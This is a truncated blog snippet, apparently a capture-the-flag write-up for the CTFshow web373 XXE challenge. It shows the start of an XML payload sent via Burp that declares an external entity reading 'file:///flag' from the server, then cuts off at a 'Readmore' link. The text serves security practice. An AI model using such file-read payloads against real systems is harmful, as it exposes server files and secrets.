ctfshow_xxe 1月 13, 2021 CTFSHOW, 安全, CTF web373用burp post下面的数据 12345<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///flag"&g ...... Readmore XXE XML